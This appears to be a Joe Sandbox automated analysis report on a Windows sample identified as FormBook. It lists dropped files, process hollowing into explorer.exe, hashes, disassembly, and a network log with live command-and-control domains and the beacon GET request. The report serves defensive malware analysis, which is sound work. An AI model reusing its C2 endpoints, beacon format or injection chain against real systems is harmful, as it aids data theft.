          System Information Discovery          		Distributed Component Object Model1
          Clipboard Data          		Scheduled Transfer12
          Application Layer Protocol          		SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script2
          Virtualization/Sandbox Evasion          		LSA Secrets251
          Security Software Discovery          		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common512
          Process Injection          		Cached Domain Credentials2
          Virtualization/Sandbox Evasion          		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync2
          Process Discovery          		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
          Remote System Discovery          		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadow1
          System Network Configuration Discovery          		Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 635319 Sample: O1ySvN9SvL Startdate: 27/05/2022 Architecture: WINDOWS Score: 100 34 www.viatempo.com 2->34 46 Snort IDS alert for network traffic 2->46 48 Found malware configuration 2->48 50 Malicious sample detected (through community Yara rule) 2->50 52 5 other signatures 2->52 12 O1ySvN9SvL.exe 19 2->12         started        signatures3 process4 file5 32 C:\Users\user\AppData\Local\Temp\zrztlh.exe, PE32 12->32 dropped 15 zrztlh.exe 12->15         started        process6 signatures7 64 Multi AV Scanner detection for dropped file 15->64 66 Tries to detect virtualization through RDTSC time measurements 15->66 18 zrztlh.exe 15->18         started        process8 signatures9 38 Modifies the context of a thread in another process (thread injection) 18->38 40 Maps a DLL or memory area into another process 18->40 42 Sample uses process hollowing technique 18->42 44 Queues an APC in another process (thread injection) 18->44 21 explorer.exe 18->21 injected process10 dnsIp11 36 www.savingshk.com 188.114.97.3, 49798, 80 CLOUDFLARENETUS European Union 21->36 54 System process connects to network (likely due to code injection or exploit) 21->54 56 Uses netstat to query active network connections and open ports 21->56 25 NETSTAT.EXE 21->25         started        signatures12 process13 signatures14 58 Modifies the context of a thread in another process (thread injection) 25->58 60 Maps a DLL or memory area into another process 25->60 62 Tries to detect virtualization through RDTSC time measurements 25->62 28 cmd.exe 1 25->28         started        process15 process16 30 conhost.exe 28->30         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          O1ySvN9SvL.exe49%VirustotalBrowse
          O1ySvN9SvL.exe54%ReversingLabsWin32.Trojan.GenericML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\zrztlh.exe50%ReversingLabsWin32.Trojan.GenericML

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          1.2.zrztlh.exe.730000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          2.2.zrztlh.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          2.0.zrztlh.exe.400000.6.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          2.0.zrztlh.exe.400000.8.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          2.0.zrztlh.exe.400000.4.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.savingshk.com/a5vu/?l2MHK=FVYX5&4hOD6=FXMAgLN/IrBd2h0A7KmJ0dUV04fd60Tmz3QO5NzukmZcmTlm3Sf9IrYXmxrDB/U5IQUf0%Avira URL Cloudsafe
          www.knoxvillehojo.com/a5vu/100%Avira URL Cloudmalware
          https://www.savingshk.com/a5vu/?l2MHK=FVYX5&4hOD6=FXMAgLN/IrBd2h0A7KmJ0dUV04fd60Tmz3QO5NzukmZcmTlm3S0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.viatempo.com
          		216.120.146.201
          		truefalse
            		unknown
            www.savingshk.com
            		188.114.97.3
            		truetrue
              		unknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://www.savingshk.com/a5vu/?l2MHK=FVYX5&4hOD6=FXMAgLN/IrBd2h0A7KmJ0dUV04fd60Tmz3QO5NzukmZcmTlm3Sf9IrYXmxrDB/U5IQUftrue
              • Avira URL Cloud: safe
              		unknown
              www.knoxvillehojo.com/a5vu/true
              • Avira URL Cloud: malware
              		low

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              https://www.savingshk.com/a5vu/?l2MHK=FVYX5&4hOD6=FXMAgLN/IrBd2h0A7KmJ0dUV04fd60Tmz3QO5NzukmZcmTlm3SNETSTAT.EXE, 0000000A.00000002.719201108.0000000003D4F000.00000004.10000000.00040000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown

              World Map of Contacted IPs

              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs

              Public IPs

              IPDomainCountryFlagASNASN NameMalicious
              188.114.97.3
              		www.savingshk.comEuropean Union
              		13335CLOUDFLARENETUStrue

              General Information

              Joe Sandbox Version:34.0.0 Boulder Opal
              Analysis ID:635319
              Start date and time: 27/05/202219:09:022022-05-27 19:09:02 +02:00
              Joe Sandbox Product:CloudBasic
              Overall analysis duration:0h 11m 14s
              Hypervisor based Inspection enabled:false
              Report type:full
              Sample file name:O1ySvN9SvL (renamed file extension from none to exe)
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
              Number of analysed new started processes analysed:25
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:1
              Technologies:
              • HCA enabled
              • EGA enabled
              • HDC enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Detection:MAL
              Classification:mal100.troj.evad.winEXE@9/4@2/1
              EGA Information:
              • Successful, ratio: 100%
              HDC Information:
              • Successful, ratio: 58.8% (good quality ratio 55%)
              • Quality average: 75.6%
              • Quality standard deviation: 30.2%
              HCA Information:
              • Successful, ratio: 99%
              • Number of executed functions: 83
              • Number of non-executed functions: 205
              Cookbook Comments:
              • Adjust boot time
              • Enable AMSI

              Warnings

              • Exclude process from analysis (whitelisted): audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
              • Excluded domains from analysis (whitelisted): www.bing.com, ris.api.iris.microsoft.com, client.wns.windows.com, fs.microsoft.com, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
              • Not all processes where analyzed, report is missing behavior information

              Simulations

              Behavior and APIs

              No simulations

              Joe Sandbox View / Context

              IPs

              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
              188.114.97.3TT COPY Euro 57,890_CI0099484_pdf.vbsGet hashmaliciousBrowse
              • www.solpunksnfts.xyz/fd46/?8pTpC=sNKJe5GJXBl7lC+WMo4ENMIbi989MjnGRheq/w7ARN8paTr80aA4mlyrWhjuNqdRzG61&u8R=-ZcXcJP
              SecuriteInfo.com.BackDoor.SiggenNET.35.30620.exeGet hashmaliciousBrowse
              • filetransfer.io/data-package/HJQBZPou/download

              Domains

              No context

              ASNs

              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
              CLOUDFLARENETUSCIQ-PO116266.jsGet hashmaliciousBrowse
              • 188.114.96.3
              CIQ-PO16266.jsGet hashmaliciousBrowse
              • 172.67.140.71
              skyrunyyu655432.exeGet hashmaliciousBrowse
              • 66.235.200.147
              https://cutt.ly/3H4eRT4Get hashmaliciousBrowse
              • 104.22.0.232
              CIQ-PO162667.jsGet hashmaliciousBrowse
              • 104.21.4.45
              In3B9i8i64.exeGet hashmaliciousBrowse
              • 172.67.222.84
              56516426-056C-4DBA-984B-979F68AB8D18 pdf.exeGet hashmaliciousBrowse
              • 162.159.134.233
              Znhawianj.exeGet hashmaliciousBrowse
              • 162.159.135.233
              N0kodnmVTc.exeGet hashmaliciousBrowse
              • 162.159.135.233
              http://www.centranum.comGet hashmaliciousBrowse
              • 104.17.146.91
              https://momshi.gq/secure/MailUpdateFreshGet hashmaliciousBrowse
              • 104.16.89.20
              ENQ # 1220014088.exeGet hashmaliciousBrowse
              • 162.159.130.233
              Advance Payment-pdf.exeGet hashmaliciousBrowse
              • 23.227.38.74
              https://dik.si/OB6x6Get hashmaliciousBrowse
              • 104.17.25.14
              DocuSign base.apkGet hashmaliciousBrowse
              • 104.18.23.10
              Swift Copy05262020.pdf.exeGet hashmaliciousBrowse
              • 104.21.56.27
              INV-233-25-05-2022.exeGet hashmaliciousBrowse
              • 104.21.62.244
              https://docsend.com/view/8nh5ucwpx9wr55u7Get hashmaliciousBrowse
              • 188.114.96.3
              swift copy 6209143.exeGet hashmaliciousBrowse
              • 104.21.9.7
              http://a.top4top.ioGet hashmaliciousBrowse
              • 104.17.24.14

              JA3 Fingerprints

              No context

              Dropped Files

              No context

              Created / dropped Files

              C:\Users\user\AppData\Local\Temp\fz42030wual6detyg

              Download File
              Process:C:\Users\user\Desktop\O1ySvN9SvL.exe
              File Type:data
              Category:dropped
              Size (bytes):189439
              Entropy (8bit):7.990543351142842
              Encrypted:true
              SSDEEP:3072:3W8NRWCc/+Y9Mo9Cvaa0i2De04Di8mFKybyGTqdm4GeHI/ynYyK5HXzK0ZX:G8jWaY9rSEin0aYHl7eHsyvizKUX
              MD5:2F03137B6ADB6A4BA50A0A014B8FCF5B
              SHA1:0A5753B7E38D9DBCCC0FCAED140DDDC90EFC0E1B
              SHA-256:1BF030BEE594672626E0855BFBCCDAA99803A12ABCED6B47F079B8C5BAFF8D88
              SHA-512:701CC2857B61D2FB70CE7556BC53B7C45055C1382AE3E288A76307AED77F84DE1C58F93FCD0865334F766F835D7862766CE93105E5E79BE64F161B295E353996
              Malicious:false
              Reputation:low
              Preview:.].P.U&G.7.S)B1ld.w0...9..4..d.O.9u....`.3.%......~..t.!e1~..08Z....{...gHp.E..#Q.{...8er_R}.G....\U....Iv....U8l......!..c.=~.G....VF......&U..{P.....+.... ....uY8.*.....^.g.*.41..........v.K.Bn1./R...&....../Z.Hc..36n.@...n.U..C..?..+..Axwj......U&G.....N..f..0..6[..R.S....d)O..u..."`...%....Q..~..t..e1~-/@eZ.lqp..1.....@y.d~.(...E..\.[v.B.|...AR.H......n.7......!..$..g..Bk=..`2E...q5....Pgz..s8g.6C......d~.....^.g.*...KW...."...(....U.n../R...h....sU/.X.?..36n.@.:..n....C@..?..+..AxGj.S....U&G.....N..fph0..6[..R......d.O.9u....`.3.%......~..t..e1~-/@eZ.lqp..1.....@y.d~.(...E..\.[v.B.|...AR.H......n.7......!..$..g..Bk=..`2E...q5....Pgz..s8g.6C......d~.....^.g.*.41.....X......,c.n1./R...h....sU/ZX.c..36n.@.:..n....C@..?..+..AxGj.S....U&G.....N..fph0..6[..R......d.O.9u....`.3.%......~..t..e1~-/@eZ.lqp..1.....@y.d~.(...E..\.[v.B.|...AR.H......n.7......!..$..g..Bk=..`2E...q5....Pgz..s8g.6C......d~.....^.g.*.41.....X......,c.n1./R...h....sU/ZX.c..36n.@.

              C:\Users\user\AppData\Local\Temp\kplemx

              Download File
              Process:C:\Users\user\Desktop\O1ySvN9SvL.exe
              File Type:data
              Category:dropped
              Size (bytes):4811
              Entropy (8bit):6.195912775198777
              Encrypted:false
              SSDEEP:96:yIr2sDOhzseowSoyp4Qo7ubAMaNbULFA5s2Flqj4ONtgOhrukWrISrbBMEPOyAn:DrKtsyM4c/1MA4stgaCRcARZ6
              MD5:5A816A757CA8331C0761575182A29C6A
              SHA1:23C2F53AC662791B9C8594FC7F95D383EC850BFF
              SHA-256:0383B4CF1FFA4FCC73FD47A22FCC3B6E6F3A57F7F5DF8782EC6074325131C501
              SHA-512:7422469246BE9836F82CB6E42764D8332C2506B1C965D5753CD3272ECD8406BDB0AFA28F0A835AD55E7C299C90D8DDC82B54E5253A447418BE4973CE482C4681
              Malicious:false
              Reputation:low
              Preview:uRVNN..z.z......^NW...W;.nW...W;.v..fN..j6NNN..bNg.Zg.>..f.vcNNN......g.Zg.>..f.vpNNN..~...g.Zg.>..f.v}NNN......g.Zg.>..f.v.NNN........>R.$.V..KK.Z...n..r..>.vR....v..z..v..j.R..|.>._]..vK.j.R...j....b.r^..vNNNN.R2Q.3.jg..g.~.g...g...g.n.g.v..`.>...Z_....b..xM.^g.....VWQ..^K.jvNNNN..2R+NNN.R2Y...b....^.....ZN..z..W...W;.f..V.N#.Z....V.N..>.B....R..f..j..V.N...V.M..f..j..ZN.@d..v.LNNv.LNN.BN..g..v.LNNv.LNN.VN.Y...v.LNNv.LNN.VN..z.z6W...W;.v..f>NNN.....j..fN.@..j.NN..j...j..f...fsrv.QNN.....V..V..N..Y...Y...v..V..mN..Y...Y..L.V..N..Q....g..v.MNN.v|igg..bsW..v.g.Vv.ggg..b..bN.P..^NsO..^MNNN..^..RN..z.z.W...W;.v..f6NNN.....j..fN.@..j.NN..j...j..f...fsrv.RNN.W..NNN..V..V..N..Y...Y...Z..V..mN..Y...Y...>..V.}m..Y...Y...B...V..|K..A...A...v..V..mL..Y...Y..Q.V..N..Q...@d..vlNNN.vujgg..b..FN.V..v..F.Ms?g.Fg.Bg.>g.Zg.Vv%hgg..b..bN.P..^NsO..^MNNN..^..BN..z.zJ..f>NNN..r..j..fN.@..j.NN..j...j..f...fsrv.KNN.....V..V..N..Yr..Yv..Z..V..mN..Yr..Yv.L.V..N..Qr..Y...v1NNN.v:jgg..bsXg.Zg.Vv.ig

              C:\Users\user\AppData\Local\Temp\nsr4D4E.tmp

              Download File
              Process:C:\Users\user\Desktop\O1ySvN9SvL.exe
              File Type:SysEx File - SIEL
              Category:dropped
              Size (bytes):394442
              Entropy (8bit):7.43868018426752
              Encrypted:false
              SSDEEP:6144:/C8jWaY9rSEin0aYHl7eHsyvizKUhxpvncW10o4at3+9:BxY9rS1n0fFq1a+URcW1IaY9
              MD5:5F2A84C4D87AE80B1D56277924271C6B
              SHA1:BF341A6B52F2B69D350AC231E00E7B44224FED0D
              SHA-256:4D361A619A510FC283CDA3C34893C71D1D6B0C0D5F54DBBA246B0D6D893FF51D
              SHA-512:A21DD4791565DE12CDA5BDFEEFC726D51E7C5490AC5C6CD3F8A707F985D925AF316114B1EC1112B8D3E0D302B4692217C9F9FBC5E918D3B08505781F54DDFFBE
              Malicious:false
              Reputation:low
              Preview:.!......,...................n............!.......!..........................................................................................................................................................................................................................................B...................j...............................................................................................................................N.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

              C:\Users\user\AppData\Local\Temp\zrztlh.exe

              Download File
              Process:C:\Users\user\Desktop\O1ySvN9SvL.exe
              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
              Category:dropped
              Size (bytes):191488
              Entropy (8bit):6.542039769461921
              Encrypted:false
              SSDEEP:3072:qfbnR6BqNvncvhwE8H0o45It38FSDblJpekds39:cpvncW10o4at3+9
              MD5:917BF3E1E68704B188F2192850C76FA6
              SHA1:9AFF83C33B7D35925C4F99075B6659EF9CBE23E0
              SHA-256:D5DF78D10BA5FD20DF7A5F27EE16146FC49842D2CD1FB6FDB94C3ABFF41DC77C
              SHA-512:EA0AD1985F6289DECA99221B6248050F91A7144884805D899E147FD561C931B6F25D9FD3DA290877AA9A37A1DFD67494998CB16B6D1BD0D8475C71422D0E8FB7
              Malicious:true
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 50%
              Reputation:low
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Z..4...4...4......4.....4......4.C.5...4...5...4...0...4......4...6...4.Rich..4.........................PE..L.....b.................\...................p....@..........................P............@.......................................... .......................0......(...T..............................@............p...............................text....[.......\.................. ..`.rdata..fa...p...b...`..............@..@.data...,1..........................@....rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................

              Static File Info

              General

              File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
              Entropy (8bit):7.946129305576003
              TrID:
              • Win32 Executable (generic) a (10002005/4) 92.16%
              • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
              • Generic Win/DOS Executable (2004/3) 0.02%
              • DOS Executable Generic (2002/1) 0.02%
              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
              File name:O1ySvN9SvL.exe
              File size:299086
              MD5:caa4c5d863a9324fa6b3a735ed446897
              SHA1:003348501064dc5646b19019592f8aefa4b44f5b
              SHA256:6796f10e7f6140f26a49bf9446b2c75dfe0e6dc7d7d88cad5e09d9b608107851
              SHA512:b2cdfc4617c7ba15bc75bb9c1aa03c3e26ce7b0553c6198a18f776ae723720191936f49b09167206b71e1b2daaac09e1b10009a814a3fe2d62c18b0e79e5f161
              SSDEEP:6144:B0Ym483boybmrpR0iOITP23OHYx2tF7G2vd5EtPHuwQOEi:q3EybmrrpTUjxyF7XvrEtPHhf
              TLSH:F25413663DE060FFF64104B30A33CB2A93775E151521A51397723FEFAC2A0DAA5263D4
              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........qJ...$...$...$./.{...$...%.;.$.".y...$..3....$.f."...$.Rich..$.........................PE..L.....iF.................Z.........

              File Icon

              Icon Hash:b2a88c96b2ca6a72

              Static PE Info

              General

              Entrypoint:0x4032fa
              Entrypoint Section:.text
              Digitally signed:false
              Imagebase:0x400000
              Subsystem:windows gui
              Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
              DLL Characteristics:
              Time Stamp:0x4669CEB6 [Fri Jun 8 21:48:38 2007 UTC]
              TLS Callbacks:
              CLR (.Net) Version:
              OS Version Major:4
              OS Version Minor:0
              File Version Major:4
              File Version Minor:0
              Subsystem Version Major:4
              Subsystem Version Minor:0
              Import Hash:55f3dfd13c0557d3e32bcbc604441dd3

              Entrypoint Preview

              Instruction
              sub esp, 00000180h
              push ebx
              push ebp
              push esi
              xor ebx, ebx
              push edi
              mov dword ptr [esp+18h], ebx
              mov dword ptr [esp+10h], 00409170h
              xor esi, esi
              mov byte ptr [esp+14h], 00000020h
              call dword ptr [00407030h]
              push ebx
              call dword ptr [00407278h]
              mov dword ptr [00423FD4h], eax
              push ebx
              lea eax, dword ptr [esp+34h]
              push 00000160h
              push eax
              push ebx
              push 0041F4E8h
              call dword ptr [00407154h]
              push 0040922Ch
              push 00423720h
              call 00007FC668A9FF08h
              call dword ptr [004070B4h]
              mov edi, 00429000h
              push eax
              push edi
              call 00007FC668A9FEF6h
              push ebx
              call dword ptr [00407108h]
              cmp byte ptr [00429000h], 00000022h
              mov dword ptr [00423F20h], eax
              mov eax, edi
              jne 00007FC668A9D76Ch
              mov byte ptr [esp+14h], 00000022h
              mov eax, 00429001h
              push dword ptr [esp+14h]
              push eax
              call 00007FC668A9F9E9h
              push eax
              call dword ptr [00407218h]
              mov dword ptr [esp+1Ch], eax
              jmp 00007FC668A9D7C5h
              cmp cl, 00000020h
              jne 00007FC668A9D768h
              inc eax
              cmp byte ptr [eax], 00000020h
              je 00007FC668A9D75Ch
              cmp byte ptr [eax], 00000022h
              mov byte ptr [esp+14h], 00000020h
              jne 00007FC668A9D768h
              inc eax
              mov byte ptr [esp+14h], 00000022h
              cmp byte ptr [eax], 0000002Fh
              jne 00007FC668A9D795h
              inc eax
              cmp byte ptr [eax], 00000053h
              jne 00007FC668A9D770h

              Rich Headers

              Programming Language:
              • [EXP] VC++ 6.0 SP5 build 8804

              Data Directories

              NameVirtual AddressVirtual Size Is in Section
              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IMPORT0x73a00xb4.rdata
              IMAGE_DIRECTORY_ENTRY_RESOURCE0x2c0000x900.rsrc
              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IAT0x70000x288.rdata
              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

              Sections

              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
              .text0x10000x59ac0x5a00False0.668142361111data6.45807821776IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              .rdata0x70000x117a0x1200False0.4453125data5.17513527374IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .data0x90000x1afd80x400False0.6015625data4.98110806401IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
              .ndata0x240000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .rsrc0x2c0000x9000xa00False0.409375data3.94448786242IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

              Resources

              NameRVASizeTypeLanguageCountry
              RT_ICON0x2c1900x2e8dataEnglishUnited States
              RT_DIALOG0x2c4780x100dataEnglishUnited States
              RT_DIALOG0x2c5780x11cdataEnglishUnited States
              RT_DIALOG0x2c6980x60dataEnglishUnited States
              RT_GROUP_ICON0x2c6f80x14dataEnglishUnited States
              RT_MANIFEST0x2c7100x1ebXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

              Imports

              DLLImport
              KERNEL32.dllSetFileTime, CompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, CreateFileA, GetFileSize, GetModuleFileNameA, GetTickCount, GetCurrentProcess, CloseHandle, ExitProcess, GetWindowsDirectoryA, GetTempPathA, GetCommandLineA, LoadLibraryA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, SetErrorMode, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, CopyFileA
              USER32.dllEndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, CreateDialogParamA, DestroyWindow, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, OpenClipboard, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
              GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
              SHELL32.dllSHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
              ADVAPI32.dllRegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
              COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
              ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
              VERSION.dllGetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

              Possible Origin

              Language of compilation systemCountry where language is spokenMap
              EnglishUnited States

              Network Behavior

              Snort IDS Alerts

              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
              192.168.2.5188.114.97.349798802031449 05/27/22-19:11:52.547625TCP2031449ET TROJAN FormBook CnC Checkin (GET)4979880192.168.2.5188.114.97.3
              192.168.2.5188.114.97.349798802031412 05/27/22-19:11:52.547625TCP2031412ET TROJAN FormBook CnC Checkin (GET)4979880192.168.2.5188.114.97.3
              192.168.2.5188.114.97.349798802031453 05/27/22-19:11:52.547625TCP2031453ET TROJAN FormBook CnC Checkin (GET)4979880192.168.2.5188.114.97.3

              Network Port Distribution

              TCP Packets

              TimestampSource PortDest PortSource IPDest IP
              May 27, 2022 19:11:52.529947996 CEST4979880192.168.2.5188.114.97.3
              May 27, 2022 19:11:52.547362089 CEST8049798188.114.97.3192.168.2.5
              May 27, 2022 19:11:52.547494888 CEST4979880192.168.2.5188.114.97.3
              May 27, 2022 19:11:52.547625065 CEST4979880192.168.2.5188.114.97.3
              May 27, 2022 19:11:52.566088915 CEST8049798188.114.97.3192.168.2.5
              May 27, 2022 19:11:52.577018023 CEST8049798188.114.97.3192.168.2.5
              May 27, 2022 19:11:52.577064037 CEST8049798188.114.97.3192.168.2.5
              May 27, 2022 19:11:52.577187061 CEST4979880192.168.2.5188.114.97.3
              May 27, 2022 19:11:52.577263117 CEST4979880192.168.2.5188.114.97.3
              May 27, 2022 19:11:52.594438076 CEST8049798188.114.97.3192.168.2.5

              UDP Packets

              TimestampSource PortDest PortSource IPDest IP
              May 27, 2022 19:11:52.497391939 CEST6147853192.168.2.58.8.8.8
              May 27, 2022 19:11:52.524352074 CEST53614788.8.8.8192.168.2.5
              May 27, 2022 19:12:35.091423035 CEST5531653192.168.2.58.8.8.8
              May 27, 2022 19:12:35.204619884 CEST53553168.8.8.8192.168.2.5

              DNS Queries

              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
              May 27, 2022 19:11:52.497391939 CEST192.168.2.58.8.8.80xd852Standard query (0)www.savingshk.comA (IP address)IN (0x0001)
              May 27, 2022 19:12:35.091423035 CEST192.168.2.58.8.8.80x3643Standard query (0)www.viatempo.comA (IP address)IN (0x0001)

              DNS Answers

              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
              May 27, 2022 19:11:52.524352074 CEST8.8.8.8192.168.2.50xd852No error (0)www.savingshk.com188.114.97.3A (IP address)IN (0x0001)
              May 27, 2022 19:11:52.524352074 CEST8.8.8.8192.168.2.50xd852No error (0)www.savingshk.com188.114.96.3A (IP address)IN (0x0001)
              May 27, 2022 19:12:35.204619884 CEST8.8.8.8192.168.2.50x3643No error (0)www.viatempo.com216.120.146.201A (IP address)IN (0x0001)

              HTTP Request Dependency Graph

              • www.savingshk.com

              HTTP Packets

              Session IDSource IPSource PortDestination IPDestination PortProcess
              0192.168.2.549798188.114.97.380C:\Windows\explorer.exe
              TimestampkBytes transferredDirectionData
              May 27, 2022 19:11:52.547625065 CEST7559OUTGET /a5vu/?l2MHK=FVYX5&4hOD6=FXMAgLN/IrBd2h0A7KmJ0dUV04fd60Tmz3QO5NzukmZcmTlm3Sf9IrYXmxrDB/U5IQUf HTTP/1.1
              Host: www.savingshk.com
              Connection: close
              Data Raw: 00 00 00 00 00 00 00
              Data Ascii:
              May 27, 2022 19:11:52.577018023 CEST7560INHTTP/1.1 301 Moved Permanently
              Date: Fri, 27 May 2022 17:11:52 GMT
              Transfer-Encoding: chunked
              Connection: close
              Cache-Control: max-age=3600
